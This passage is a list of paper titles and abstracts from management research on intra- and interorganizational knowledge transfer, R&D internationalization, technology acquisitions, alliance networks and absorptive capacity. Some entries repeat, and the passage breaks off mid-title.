Furthermore, the positive effect of the use of interdivisional knowledge on the impact of an invention is stronger than the effect of using knowledge from within divisional boundaries or from outside firm boundaries. Our empirical findings have significant implications for the management of knowledge in diversified firms. --- paper_title: Knowledge-relatedness in firm technological diversification paper_content: Abstract This paper claims that knowledge-relatedness is a key factor in affecting firms’ technological diversification. The hypothesis is tested that firms extend the range of their innovative activities in a non-random way. Specifically, we test the extent to which firms diversify their innovative activities across related technological fields, i.e. fields that share a common knowledge base and rely upon common heuristics and scientific principles. The paper proposes an original measure of knowledge-relatedness, using co-classification codes contained in patent documents, and examines the patterns of technological diversification of the whole population of firms from the United States, Italy, France, UK, Germany, and Japan patenting to the European Patent Office from 1982 to 1993. Robust evidence is found that knowledge-relatedness is a major feature of firms’ innovative activities. --- paper_title: The Uncertain Relevance of Newness: Organizational Learning and Knowledge Flows paper_content: This study explores how organizational learning in subunits affects outflows of knowledge to other subunits. Three learning processes are explored: Collecting new knowledge, codifying knowledge, an... --- paper_title: Knowledge transfer in international acquisitions paper_content: This paper reports on a multimethod study of knowledge transfer in international acquisitions. Using questionnaire data we show that the transfer of technological know-how is facilitated by communication, visits & meetings, and by time elapsed since acquisition, while the transfer of patents is associated with the articulability of the knowledge, the size of the acquired unit, and the recency of the acquisition. Using case study data, we show that the immediate post-acquisition period is characterized by imposed one-way transfers of knowledge from the acquirer to the acquired, but over time this gives way to high-quality reciprocal knowledge transfer. --- paper_title: Distributed R&D, Cross-Regional Knowledge Integration and Quality of Innovative Output paper_content: We explore the impact of geographic dispersion of a firm's R&D activities on the quality of its innovative output. Using data on over half a million patents from 1,127 firms, we find that having geographically distributed R&D per se does not improve the quality of a firm's innovations. In fact, distributed R&D appears to be negatively associated with average value of innovations. This suggests that potential gains from access to diverse ideas and expertise from different locations probably get offset by difficulty in achieving integration of knowledge across multiple locations. To investigate whether the innovating teams that do manage cross-fertilization of ideas from different locations achieve more valuable innovations, we analyze innovations for which there is evidence of such knowledge cross-fertilization along one of the following dimensions: knowledge sourcing from remote R&D units, having at least one inventor with cross-regional ties, and having at least one inventor that has recently moved from another region.
Analysis along these three dimensions consistently reveals a positive relationship between cross-regional knowledge integration and quality of resulting innovations. More generally, our findings provide new evidence regarding the importance of cross-unit integrative mechanisms for achieving superior performance in multi-unit firms. --- paper_title: Geographic Distribution of R&D Activity: How Does it Affect Innovation Quality? paper_content: I examine the impact of the geographic distribution of R&D activity on the quality of innovation. Through an analysis of patent data from 100 firms in the global semiconductor manufacturing industr... --- paper_title: Knowledge spillovers and the assignment of R&D responsibilities to foreign subsidiaries paper_content: Research on R&D location choice by MNCs has focused largely on host country factor endowments and overlooked the role that the potential to capture and utilize knowledge spillovers from competitors may also play in determining such choices. Using a large‐scale panel database of the foreign subsidiaries of U.S.‐based MNCs in above‐average R&D‐intensive industries, we examine the extent to which external spillover opportunities as well as internal firm‐specific capabilities to utilize such knowledge affect MNCs' new R&D location decisions. Our findings suggest that MNCs appear to anticipate potential spillover opportunities and are discriminating in assessing these opportunities not only across locations but also across categories of competitors within the same location. Further, our findings provide stronger support to predictions regarding the salience of global utilization capacity than they do to predictions regarding the salience of local utilization capacity. Copyright © 2004 John Wiley & Sons, Ltd. --- paper_title: How firms innovate through R&D internationalization? An S-curve hypothesis paper_content: This article examines the effects of R&D internationalization and organizational slack on innovation performance. We suggest that there is an S-shaped relationship between R&D internationalization and innovation performance. Innovation performance increases in the decentralization stage, decreases in the transition stage, and increases again in the recentralization stage. In addition, organizational slack is hypothesized to have a negative moderating effect on the S-shaped relationship. Longitudinal data on 210 Taiwanese firms in the information technology sector during a 10-year period is collected to test the hypotheses. The findings support our prediction. Managerial implications and future research directions are discussed. --- paper_title: Acquiring New Technologies and Capabilities: A Grounded Model of Acquisition Implementation paper_content: In this study, we explore seven in-depth cases of high-technology acquisitions and develop an empirically grounded model of technology and capability transfer during acquisition implementation. We assess how the nature of the acquired firms' knowledge-based resources, as well as multiple dimensions of acquisition implementation, have both independent and interactive effects on the successful appropriation of technologies and capabilities by the acquirer. Our inquiry contributes to the growing body of research examining the transfer of knowledge both between and within organizations. 
Propositions are developed to help guide further inquiry into the dynamics of acquisition implementation processes in general and, more specifically, the process of acquiring new technologies and capabilities from other firms. --- paper_title: ORGANIZING FOR INNOVATION: MANAGING THE COORDINATION-AUTONOMY DILEMMA IN TECHNOLOGY ACQUISITIONS paper_content: Large, established firms acquiring small, technology-based firms must manage them so as to both exploit their capabilities and technologies in a coordinated way and foster their exploration capacity by preserving their autonomy. We suggest that acquirers can resolve this coordination-autonomy dilemma by recognizing that the effect of structural form on innovation outcomes depends on the developmental stage of acquired firms’ innovation trajectories. Structural integration decreases the likelihood of introducing new products for firms that have not launched products before being acquired and for all firms immediately after acquisition, but these effects disappear as innovation trajectories evolve. --- paper_title: Social Structure of “Coopetition” Within a Multiunit Organization: Coordination, Competition, and Intraorganizational Knowledge Sharing paper_content: Drawing on a social network perspective of organizational coordination, this paper investigates the effectiveness of coordination mechanisms on knowledge sharing in intraorganizational networks that consist of both collaborative and competitive ties among organizational units. Internal knowledge sharing within a multiunit organization requires formal hierarchical structure and informal lateral relations as coordination mechanisms. Using sociometric techniques, this paper analyzes how formal hierarchical structure and informal lateral relations influence knowledge sharing and how interunit competition moderates the association between such coordination mechanisms and knowledge sharing in a large, multiunit company. Results show that formal hierarchical structure, in the form of centralization, has a significant negative effect on knowledge sharing, and informal lateral relations, in the form of social interaction, have a significant positive effect on knowledge sharing among units that compete with each other for market share, but not among units that compete with each other for internal resources. --- paper_title: R&D, organization structure, and the development of corporate technological knowledge paper_content: We explore the link between a firm's organization of research - specifically, its choice to operate a centralized or decentralized R&D structure - and the type of innovation it produces. We propose that by reducing the internal transaction costs associated with R&D coordination across units, centralized R&D will generate innovations that have a larger and broader impact on subsequent technological evolution than will decentralized research. We also propose that by facilitating more distant (capabilities-broadening) search, centralized R&D will generate innovations that draw on a wider range of technologies. Our empirical results provide support for our predictions concerning impact, and mixed results for our predictions concerning breadth of search. We also find that control over research budgets complements direct authority relations in contributing to innovative impact. We propose several extensions of this research.
--- paper_title: Beyond local search: boundary-spanning, exploration, and impact in the optical disk industry paper_content: Recognition of the firm's tendency toward local search has given rise to concepts celebrating exploration that overcomes this tendency. To move beyond local search requires that exploration span some boundary, be it organizational or technological. While several studies have encouraged boundary-spanning exploration, few have considered both types of boundaries systematically. In doing so, we create a typology of exploration behaviors: local exploration spans neither boundary, external boundary-spanning exploration spans the firm boundary only, internal boundary-spanning exploration spans the technological boundary only, and radical exploration spans both boundaries. Using this typology, we analyze the impact of knowledge generated by these different types of exploration on subsequent technological evolution. ::: ::: In our study of patenting activity in optical disk technology, we find that exploration that does not span organizational boundaries consistently generates lower impact on subsequent technological evolution. In addition, we find that the impact of exploration on subsequent technological evolution within the optical disk domain is highest when the exploration spans organizational boundaries but not technological boundaries. At the same time, we find that the impact of exploration on subsequent technological development beyond the optical disk domain is greatest when exploration spans both organizational and technological boundaries. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Knowledge flows within multinational corporations paper_content: Pursuing a nodal (i.e., subsidiary) level of analysis, this paper advances and tests an overarching theoretical framework pertaining to intracorporate knowledge transfers within multinational corporations (MNCs). We predicted that (i) knowledge outflows from a subsidiary would be positively associated with value of the subsidiary’s knowledge stock, its motivational disposition to share knowledge, and the richness of transmission channels; and (ii) knowledge inflows into a subsidiary would be positively associated with richness of transmission channels, motivational disposition to acquire knowledge, and the capacity to absorb the incoming knowledge. These predictions were tested empirically with data from 374 subsidiaries within 75 MNCs headquartered in the U.S., Europe, and Japan. Except for our predictions regarding the impact of source unit's motivational disposition on knowledge outflows, the data provide either full or partial support to all of the other elements of our theoretical framework. Copyright © 2000 John Wiley & Sons, Ltd. --- paper_title: Centrifugal and Centripetal Forces in Radical New Product Development Under Time Pressure paper_content: Organizations must be ambidextrous to successfully develop new products—they must act creatively as well as collectively. However, how to do this is not clear. The author analyzes this problem and reviews the literature in terms of two opposing forces: the first increases the quantity and quality of ideas, information, and knowledge available for creative action while the second integrates these things into collective action. The author then models these forces to explain how the coexistence of contradictory structural elements and processes increases the probability of successful development. 
--- paper_title: Do High Technology Acquirers Become More Innovative paper_content: Drawing on organizational, managerial and financial theories, we explore whether acquirers become more innovative and the factors that can enhance their absorptive and financial capacity to benefit from acquisition. Over a 3-year post-acquisition window, our sample of 2624 high technology US acquisitions records early reverses followed by positive R&D-intensity changes and insignificant R&D productivity changes. Controlling for acquisition endogeneity and deal-specific effects, significant acquirer characteristic effects emerge. In related acquisitions, a large knowledge base tends to increase R&D productivity, consistent with an enhanced capacity to select and absorb targets. In unrelated acquisitions, however, this relationship becomes increasingly negative as knowledge base concentration increases, consistent with arguments for an impaired peripheral vision and core rigidities. High leverage levels raise R&D productivity gains, consistent with enhanced monitoring induced efficiency. However, high leverage growth reduces R&D-intensity, consistent with increased financial constraints and short-termism. --- paper_title: Technological acquisitions and the innovation performance of acquiring firms: a longitudinal study paper_content: This paper examines the impact of acquisitions on the subsequent innovation performance of acquiring firms in the chemicals industry. We distinguish between technological acquisitions, acquisitions in which technology is a component of the acquired firm's assets, and nontechnological acquisitions: acquisitions that do not involve a technological component. We develop a framework relating acquisitions to firm innovation performance and develop a set of measures for quantifying the technological inputs a firm obtains through acquisitions. We find that within technological acquisitions absolute size of the acquired knowledge base enhances innovation performance, while relative size of the acquired knowledge base reduces innovation output. The relatedness of acquired and acquiring knowledge bases has a nonlinear impact on innovation output. Nontechnological acquisitions do not have a significant effect on subsequent innovation output. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Open for innovation: the role of openness in explaining innovation performance among U.K. manufacturing firms paper_content: A central part of the innovation process concerns the way firms go about organizing search for new ideas that have commercial potential. New models of innovation have suggested that many innovative firms have changed the way they search for new ideas, adopting open search strategies that involve the use of a wide range of external actors and sources to help them achieve and sustain innovation. Using a large-scale sample of industrial firms, this paper links search strategy to innovative performance, finding that searching widely and deeply is curvilinearly (taking an inverted U-shape) related to performance. Copyright © 2005 John Wiley & Sons, Ltd. --- paper_title: The influence of corporate acquisitions on the behaviour of key inventors paper_content: The behaviour of key inventors after the acquisition of their company is examined. Key inventors are identified on the basis of their patenting output. They account for a large number of their company's high-quality patents.
The analysis of 43 acquisitions shows that key inventors leave to a substantial extent their company or they significantly reduce their patenting performance after the acquisition. Factors influencing the behaviour of key inventors after acquisitions are identified. Implications for the effective management of acquisitions as well as suggestions for further research are outlined. --- paper_title: Learning Through Acquisitions paper_content: Research on acquisitions has typically focused on acquisitions per se, examining issues such as performance and implementation problems. This study moves beyond that perspective and studies the influence on a firm's later expansions. We argue that exploitation of a firm's knowledge base through “greenfields” eventually makes a firm simple and inert. In contrast, acquisitions may broaden a firm's knowledge base and decrease inertia, enhancing the viability of its later ventures. Over time, firms strike a balance between the use of greenfields and acquisitions. Various implications of this theory—tested with survival analysis and “logit” models—were strongly corroborated. --- paper_title: Geographic Distribution of R&D Activity: How Does it Affect Innovation Quality? paper_content: I examine the impact of the geographic distribution of R&D activity on the quality of innovation. Through an analysis of patent data from 100 firms in the global semiconductor manufacturing industr... --- paper_title: Knowledge Sharing in Organizations: Multiple Networks, Multiple Phases paper_content: Different subsets of social networks may explain knowledge sharing outcomes in different ways. One subset may counteract another subset, and one subset may explain one outcome but not another. We found support for these arguments in an analysis of a sample of 121 new-product development teams. Within-team and interunit networks had different effects on the outcomes of three knowledge-sharing phases: deciding whether to seek knowledge across subunits, search costs, and costs of transfers. These results suggest that research on knowledge sharing can be advanced by studying how multiple networks affect various phases of knowledge sharing. --- paper_title: Distributed R&D, Cross-Regional Knowledge Integration and Quality of Innovative Output paper_content: We explore the impact of geographic dispersion of a firm's R&D activities on the quality of its innovative output. Using data on over half a million patents from 1,127 firms, we find that having geographically distributed R&D per se does not improve the quality of a firm's innovations. In fact, distributed R&D appears to be negatively associated with average value of innovations. This suggests that potential gains from access to diverse ideas and expertise from different locations probably gets offset by difficulty in achieving integration of knowledge across multiple locations. To investigate whether the innovating teams that do manage cross-fertilization of ideas from different locations achieve more valuable innovations, we analyze innovations for which there is evidence of such knowledge cross-fertilization along one of the followings dimensions: knowledge sourcing from remote R&D units, having at least one inventor with cross-regional ties, and having at least one inventor that has recently moved from another region. Analysis along these three dimensions consistently reveals a positive relationship between cross-regional knowledge integration and quality of resulting innovations. 
More generally, our findings provide new evidence regarding the importance of cross-unit integrative mechanisms for achieving superior performance in multi-unit firms. --- paper_title: National Cultural Distance and Cross-Border Acquisition Performance paper_content: Previous theoretical research has argued that national cultural distance hinders cross-border acquisition performance by increasing the costs of integration. This article tests the alternative hypothesis that national cultural distance enhances cross-border acquisition performance by providing access to the target's and/or the acquirer's diverse set of routines and repertoires embedded in national culture. Using a multi-dimensional measure of national cultural distance and controlling for other effects, we examine a sample of 52 cross-border acquisitions that took place between 1987 and 1992, and find a positive association between national cultural distance and cross-border acquisition performance.© 1998 JIBS. Journal of International Business Studies (1998) 29, 137–158 --- paper_title: How firms innovate through R&D internationalization? An S-curve hypothesis paper_content: This article examines the effects of R&D internationalization and organizational slack on innovation performance. We suggest that there is an S-shaped relationship between R&D internationalization and innovation performance. Innovation performance increases in the decentralization stage, decreases in the transition stage, and increases again in the recentralization stage. In addition, organizational slack is hypothesized to have a negative moderating effect on the S-shaped relationship. Longitudinal data on 210 Taiwanese firms in the information technology sector during a 10-year period is collected to test the hypotheses. The findings support our prediction. Managerial implications and future research directions are discussed. --- paper_title: Explaining the National Cultural Distance Paradox paper_content: Past studies of the relationship between national cultural distance and entry mode choice have produced conflicting results. Some scholars find cultural distance associated with choosing wholly owned modes; others find cultural distance linked to a preference for joint ventures. In this paper we provide both theoretical and empirical evidence to explain the discrepant findings and thus, help to resolve the national cultural distance paradox. --- paper_title: Absorptive Capacity: A New Perspective on Learning and Innovation paper_content: Discusses the notion that the ability to exploit external knowledge is crucial to a firm's innovative capabilities. In addition, it is argued that the ability to evaluate and use outside knowledge is largely a function of the level of prior related knowledge--i.e., absorptive capacity. Prior research has shown that firms that conduct their own research and development (R&D) are better able to use information from external sources. Therefore, it is possible that the absorptive capacity of a firm is created as a byproduct of the firm's R&D investment. A simple model of firm R&D intensity is constructed in a broader context of what applied economists call the three classes of industry-level determinants of R&D intensity: demand, appropriability, and technological opportunity conditions. Several predictions are made, including the notions that absorptive capacity does have a direct effect on R&D spending and spillovers will provide a positive incentive to conduct R&D. 
All hypotheses are tested using cross-sectional survey data on technological opportunity and appropriability conditions--collected over the period 1975 to 1977 for 1,719 business units--in the American manufacturing sector from Levin et al. (1983, 1987) and the Federal Trade Commission's Line of Business Program data on business unit sales, transfers, and R&D expenditures. Results confirm that firms are sensitive to the characteristics of the learning environment in which they operate and that absorptive capacity does appear to be a part of a firm's decisions regarding resource allocation for innovative activity. Results also suggest that, although the analysis showing a positive effect of spillovers in two industry groups do not represent a direct test of the model, positive absorption incentive associated with spillovers may be sufficiently strong in some cases to more than offset the negative appropribility incentive. (SFL) --- paper_title: External Sources of Innovative Capabilities: The Preferences for Strategic Alliances or Mergers and Acquisitions paper_content: This paper explores the preferences that companies have as they use alternative (quasi) external sources of innovative competencies such as strategic technology alliances, mergers and acquisitions, or a mix of these. These alternatives are studied in the context of distinct industrial, technological and international settings during the first half of the 1990s. Different strategies followed by companies and the role played by routinized sets of preferences are also taken into consideration. The analysis demonstrates that these options are influenced by both different environmental conditions and firm specific circumstances, such as those related to protecting core businesses. --- paper_title: Technological acquisitions and the innovation performance of acquiring firms: a longitudinal study paper_content: This paper examines the impact of acquisitions on the subsequent innovation performance of acquiring firms in the chemicals industry. We distinguish between technological acquisitions, acquisitions in which technology is a component of the acquired firm's assets, and nontechnological acquisitions: acquisitions that do not involve a technological component. We develop a framework relating acquisitions to firm innovation performance and develop a set of measures for quantifying the technological inputs a firm obtains through acquisitions. We find that within technological acquisitions absolute size of the acquired knowledge base enhances innovation performance, while relative size of the acquired knowledge base reduces innovation output. The relatedness of acquired and acquiring knowledge bases has a nonlinear impact on innovation output. Nontechnological acquisitions do not have a significant effect on subsequent innovation output. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Network Structure and Knowledge Transfer: The Effects of Cohesion and Range paper_content: This research considers how different features of informal networks affect knowledge transfer. As a complement to previous research that has emphasized the dyadic tie strength component of informal networks, we focus on how network structure influences the knowledge transfer process. We propose that social cohesion around a relationship affects the willingness and motivation of individuals to invest time, energy, and effort in sharing knowledge with others. 
We further argue that the network range, ties to different knowledge pools, increases a person's ability to convey complex ideas to heterogeneous audiences. We also examine explanations for knowledge transfer based on absorptive capacity, which emphasizes the role of common knowledge, and relational embeddedness, which stresses the importance of tie strength. We investigate the network effect on knowledge transfer using data from a contract R&D firm. The results indicate that both social cohesion and network range ease knowledge transfer, over and abov... --- paper_title: Don't go it alone: alliance network composition and startups' performance in Canadian biotechnology paper_content: We combine theory and research on alliance networks and on new firms to investigate the impact of variation in startups’ alliance network composition on their early performance. We hypothesize that startups can enhance their early performance by 1) establishing alliances, 2) configuring them into an efficient network that provides access to diverse information and capabilities with minimum costs of redundancy, conflict, and complexity, and 3) judiciously allying with potential rivals that provide more opportunity for learning and less risk of intra-alliance rivalry. An analysis of Canadian biotech startups’ performance provides broad support for our hypotheses, especially as they relate to innovative performance. Overall, our findings show how variation in the alliance networks startups configure at the time of their founding produces significant differences in their early performance, contributing directly to an explanation of how and why firm age and size affect firm performance. We discuss some clear, but challenging, implications for managers of startups. Copyright © 2000 John Wiley & Sons, Ltd. --- paper_title: The Embeddedness of Networks: Institutions, Structural Holes, and Innovativeness in the Fuel Cell Industry paper_content: Plentiful research suggests that embeddedness in alliance networks influences firms’ innovativeness. This research, however, has mostly overlooked the fact that interorganizational ties are themselves embedded within larger institutional contexts that can shape the effects of networks on organizational outcomes. We address this gap in the literature by arguing that national institutions affect the extent to which specific network positions, such as brokerage, influence innovation. We explore this idea in the context of corporatism, which fosters an institutional logic of collaboration that influences the broker’s ability to manage its partnerships and recombine the knowledge residing in its network as well as the extent of knowledge flows among network participants. We argue that differences in institutional logics lead brokerage positions to exert different effects on firm innovativeness. We propose that the firm spanning structural holes obtains the greatest innovation benefits when the firm the broker or its alliance partners are based in highly corporatist countries, or under certain combinations of broker and partner corporatism. We find support for these ideas through a longitudinal study of cross-border fuel cell technology alliance networks involving 109 firms from nine countries between 1981 and 2001. 
--- paper_title: Knowledge Networks: Explaining Effective Knowledge Sharing in Multiunit Companies paper_content: This paper introduces the concept of knowledge networks to explain why some business units are able to benefit from knowledge residing in other parts of the company while others are not. The core premise of this concept is that a proper understanding of effective interunit knowledge sharing in a multiunit firm requires a joint consideration of relatedness in knowledge content among business units and the network of lateral interunit relations that enables task units to access related knowledge. Results from a study of 120 new product development projects in 41 business units of a large multiunit electronics company showed that project teams obtained more existing knowledge from other units and completed their projects faster to the extent that they had short interunit network paths to units that possessed related knowledge. In contrast, neither network connections nor extent of related knowledge alone explained the amount of knowledge obtained and project completion time. The results also showed a contingent effect of having direct interunit relations in knowledge networks: While established direct relations mitigated problems of transferring noncodified knowledge, they were harmful when the knowledge to be transferred was codified, because they were less needed but still involved maintenance costs. These findings suggest that research on knowledge transfers and synergies in multiunit firms should pursue new perspectives that combine the concepts of network connections and relatedness in knowledge content. --- paper_title: Knowledge Networks as Channels and Conduits: The Effects of Spillovers in the Boston Biotechnology Community paper_content: We contend that two important, nonrelational, features of formal interorganizational networks-geographic propinquity and organizational form-fundamentally alter the flow of information through a network. Within regional economies, contractual linkages among physically proximate organizations represent relatively transparent channels for information transfer because they are embedded in an ecology rich in informal and labor market transmission mechanisms. Similarly, we argue that the spillovers that result from proprietary alliances are a function of the institutional commitments and practices of members of the network. When the dominant nodes in an innovation network are committed to open regimes of information disclosure, the entire structure is characterized by less tightly monitored ties. The relative accessibility of knowledge transferred through contractual linkages to organizations determines whether innovation benefits accrue broadly to membership in a coherent network component or narrowly to centrality. We draw on novel network visualization methods and conditional fixed effects negative binomial regressions to test these arguments for human therapeutic biotechnology firms located in the Boston metropolitan area. --- paper_title: Interorganizational alliances and the performance of firms : A study of growth and innovation rates in a high-technology industry paper_content: This paper investigates the relationship between intercorporate technology alliances and firm performance. It argues that alliances are access relationships, and therefore that the advantages which a focal firm derives from a portfolio of strategic coalitions depend upon the resource profiles of its alliance partners. 
In particular, large firms and those that possess leading-edge technological resources are posited to be the most valuable associates. The paper also argues that alliances are both pathways for the exchange of resources and signals that convey social status and recognition. Particularly when one of the firms in an alliance is a young or small organization or, more generally, an organization of equivocal quality, alliances can act as endorsements: they build public confidence in the value of an organization's products and services and thereby facilitate the firm's efforts to attract customers and other corporate partners. The findings from models of sales growth and innovation rates in a large sample of semiconductor producers confirm that organizations with large and innovative alliance partners perform better than otherwise comparable firms that lack such partners. Consistent with the status-transfer arguments, the findings also demonstrate that young and small firms benefit more from large and innovative strategic alliance partners than do old and large organizations. Copyright © 2000 John Wiley & Sons, Ltd. --- paper_title: Interorganizational Collaboration and Innovation: Toward a Portfolio Approach* paper_content: In the literature on innovation, interorganizational collaboration has been advanced as beneficial for the innovative performance of firms. At the same time, large-scale empirical evidence for such a relationship is scarce. This article examines whether evidence can be found for the idea that interorganizational collaboration supports the effectiveness of innovation strategies. This article empirically addresses this research question by analyzing data on Belgian manufacturing firms (n=221) collected in the Community Innovation Survey, a biannual survey organized by Eurostat and the European Commission aimed at obtaining insights into the innovation practices and performance of companies within the various European Union (EU) member states. Tobit analyses reveal a positive relationship between interorganizational collaboration and innovative performance. At the same time, the impact on innovative performance differs depending on the nature of the partner(s) involved. These findings strongly suggest the relevance of adopting a portfolio approach to interorganizational collaboration within the context of innovation strategies. --- paper_title: Absorptive capacity, learning, and performance in international joint ventures paper_content: This paper proposes and tests a model of IJV learning and performance that segments absorptive capacity into the three components originally proposed by Cohen and Levinthal (1990). First, trust between an IJV's parents and the IJV's relative absorptive capacity with its foreign parent are suggested to influence its ability to understand new knowledge held by foreign parents. Second, an IJV's learning structures and processes are proposed to influence its ability to assimilate new knowledge from those parents. Third, the IJV's strategy and training competence are suggested to shape its ability to apply the assimilated knowledge. Revisiting the Hungarian IJVs studied by Lyles and Salk (1996) 3 years later, we find support for the knowledge understanding and application predictions, and partial support for the knowledge assimilation prediction. Unexpectedly, our results suggest that trust and management support from foreign parents are associated with IJV performance but not learning. 
Our model and results offer a new perspective on IJV learning and performance as well as initial insights into how those relationships change over time. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Contingencies in collaborative innovation: matching organisational learning with strategic orientation and environmental munificence paper_content: Matching organisational learning with internal and external contingency factors is important for firms in emerging economies in order to improve their collaborative innovation. This study investigates the fit, in collaborative innovation, between: 1) a firm’s organisational learning; 2) its strategic orientation and the environmental munificence. Using a sample of 136 Chinese firms that engage in R&D collaboration, we examine the fit effects of organisational learning (exploratory learning and exploitative learning) and the contingency factors (strategic orientation and environmental munificence) on collaborative innovation performance, and find that exploratory learning coupled with resource-driven strategic orientation and high environmental munificence enhances collaborative innovation performance, while exploitative learning coupled with opportunity-driven strategic orientation and low environmental munificence enhances collaborative innovation performance. --- paper_title: Network structure and innovation: The leveraging of a dual network as a distinctive relational capability paper_content: This paper employs comparative longitudinal case study research to investigate why and how strong dyadic interfirm ties and two alternative network architectures (a ‘strong ties network’ and a ‘dual network’) impact the innovative capability of the lead firm in an alliance network. I answer these intrinsically cross-level research questions by examining how three design-intensive furnishings manufacturers managed their networks of joint-design alliances with consulting industrial design firms over more than 30 years. Initially, in order to explore the sample lead firms’ alliance behavior, I advance an operationalization of interorganizational tie strength. Next, I unveil the strengths of strong ties and the weaknesses of a strong ties network. Finally, I show that the ability to integrate a large periphery of heterogeneous weak ties and a core of strong ties is a distinctive lead firm’s relational capability, one that provides fertile ground for leading firms in knowledge-intensive alliance networks to gain competitive advantages whose sustainability is primarily based on the dynamic innovative capability resulting from leveraging a dual network architecture. --- paper_title: Social capital, knowledge acquisition, and knowledge exploitation in young technology-based firms paper_content: Employing a sample of 180 entrepreneurial high-technology ventures based in the United Kingdom, we examine the effects of social capital in key customer relationships on knowledge acquisition and knowledge exploitation. Building on the relational view and on social capital and knowledge-based theories, we propose that social capital facilitates external knowledge acquisition in key customer relationships and that such knowledge mediates the relationship between social capital and knowledge exploitation for competitive advantage. 
Our results indicate that the social interaction and network ties dimensions of social capital are indeed associated with greater knowledge acquisition, but that the relationship quality dimension is negatively associated with knowledge acquisition. Knowledge acquisition is, in turn, positively associated with knowledge exploitation for competitive advantage through new product development, technological distinctiveness, and sales cost efficiency. Further, our results provide evidence that knowledge acquisition plays a mediating role between social capital and knowledge exploitation. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Interfirm Collaboration Networks: The Impact of Large-Scale Network Structure on Firm Innovation paper_content: The structure of alliance networks influences their potential for knowledge creation. Dense local clustering provides information transmission capacity in the network by fostering communication and cooperation. Nonredundant connections contract the distance between firms and give the network greater reach by tapping a wider range of knowledge resources. We propose that firms embedded in alliance networks that exhibit both high clustering and high reach (short average path lengths to a wide range of firms) will have greater innovative output than firms in networks that do not exhibit these characteristics. We find support for this proposition in a longitudinal study of the patent performance of 1,106 firms in 11 industry-level alliance networks. --- paper_title: KNOWLEDGE TRANSFER IN INTRAORGANIZATIONAL NETWORKS: EFFECTS OF NETWORK POSITION AND ABSORPTIVE CAPACITY ON BUSINESS UNIT INNOVATION AND PERFORMANCE paper_content: Inside a multiunit organization, units can learn from each other and benefit from new knowledge developed by other units. Knowledge transfer among organizational units provides opportunities for mutual learning and interunit cooperation that stimulate the creation of new knowledge and, at the same time, contribute to organizational units' ability to innovate (e.g., Kogut & Zander, 1992; Tsai & --- paper_title: Alliance Type, Alliance Experience, and Alliance Management Capability in High-technology Ventures paper_content: Building on the recent theoretical notion that a firm's alliance management capability can be a source of competitive advantage (Dyer and Singh, 1998; Ireland, Hitt, and Vaidyanath, 2002), we empirically investigate the effect of alliance-specific and firm-level factors on a high-technology venture's alliance management capability. We define alliance management capability as a firm's ability to effectively manage multiple alliances. To test the effect of alliance type on alliance management capability, we first establish that the relationship between a high-technology venture's R&D alliances and its new product development is inverted U-shaped, regardless of alliance type (i.e., upstream, horizontal, and downstream alliances). Then, we posit that different alliance types place differential demands on a firm's alliance management capability due to the different types of partners involved and due to the different types of knowledge being transferred. Finally, we argue that firms build an alliance management capability through cumulative experience with strategic alliances over time. 
We test the effects of alliance type and alliance experience on alliance management capability by drawing on a sample of 2,226 R&D alliances entered into by 325 global biotechnology firms in the twenty-five year period between 1973 and 1997. We find that alliance type and alliance experience moderate the relationship between a high-technology venture's R&D alliances and its new product development. These results provide some preliminary empirical evidence for the existence of an alliance management capability. The results further highlight the relevance of alliance management capability for high-technology ventures since alliance experience appears to be a distinct construct, different from firm age and firm size. Taken together, these results underscore both the ability of a high-tech venture to create a competitive advantage based on its alliance management capability and the risks alliances pose if the firm's alliance activity exceeds its alliance management capability. Managers in high-tech ventures need to consider their current alliance portfolio as well as potential alliances within the context of their firm's alliance management capability. --- paper_title: Post-formation dynamics in strategic alliances paper_content: This paper investigates the occurrence and determinants of post-formation governance changes in strategic alliances, including alterations in alliances' contracts, boards or oversight committees, and monitoring mechanisms. We examine alliances in the biotechnology industry and find that firms' unique alliance experience trajectories affect the likelihood of such ex post adjustments in these partnerships. Transactional features such as the alliance's scope, its division of labor, and the relevance of the collaboration to the parent firm also bear upon alliances' dynamics. We discuss the implications of these findings and how they complement prior research focusing on alliance design or termination at opposite ends of the alliance life cycle. Copyright © 2002 John Wiley & Sons, Ltd. --- paper_title: Why do firms do basic research (with their own money) paper_content: Abstract The question to be addressed is: Why do private firms perform basic research with their own money? Interest in this question derives from both analytical and utilitarian considerations. There is empirical evidence in the United States, which provides the main context for this paper, supporting the view that basic research makes a significant contribution to the productivity growth of the economy [4,7]. It is widely held that social returns from basic research are significant and higher than private returns and it is for this reason that most such activities continue to be financed by the taxpayer. This also implies that measures aimed at increasing basic research by the private sector will be welfare improving. In the United States, the federal government in the years since the Second World War has provided the vast majority of all funds devoted to basic research. Although the federal share has been declining in recent years, and although that share is at its lowest level in about 20 years, it still constitutes about two-thirds of the total [10]… --- paper_title: Do High Technology Acquirers Become More Innovative paper_content: Drawing on organizational, managerial and financial theories, we explore whether acquirers become more innovative and the factors that can enhance their absorptive and financial capacity to benefit from acquisition.
Over a 3-year post-acquisition window, our sample of 2624 high technology US acquisitions records early reverses followed by positive R&D-intensity changes and insignificant R&D productivity changes. Controlling for acquisition endogeneity and deal-specific effects, significant acquirer characteristic effects emerge. In related acquisitions, a large knowledge base tends to increase R&D productivity, consistent with an enhanced capacity to select and absorb targets. In unrelated acquisitions, however, this relationship becomes increasingly negative as knowledge base concentration increases, consistent with arguments for an impaired peripheral vision and core rigidities. High leverage levels raise R&D productivity gains, consistent with enhanced monitoring induced efficiency. However, high leverage growth reduces R&D-intensity, consistent with increased financial constraints and short-termism. --- paper_title: ABSORPTIVE CAPACITY: A REVIEW, RECONCEPTUALIZATION, AND EXTENSION. paper_content: Researchers have used the absorptive capacity construct to explain various organizational phenomena. In this article we review the literature to identify key dimensions of absorptive capacity and offer a reconceptualization of this construct. Building upon the dynamic capabilities view of the firm, we distinguish between a firm's potential and realized capacity. We then advance a model outlining the conditions when the firm's potential and realized capacities can differentially influence the creation and sustenance of its competitive advantage. --- paper_title: Absorptive capacity and the search for innovation paper_content: This paper examines the link between a firm's absorptive capacity-building activities and the search process for innovation. We propose that the enhanced access to university research enjoyed by firms that engage in basic research and collaborate with university scientists leads to superior search for new inventions and provides advantage in terms of both the timing and quality of search outcomes. Results based on a panel data of pharmaceutical and biotechnology firms support these contentions and suggest that the two research activities are mutually beneficial, but also uncover intriguing differences that suggest differing roles of internally and externally developed knowledge. --- paper_title: KNOWLEDGE TRANSFER 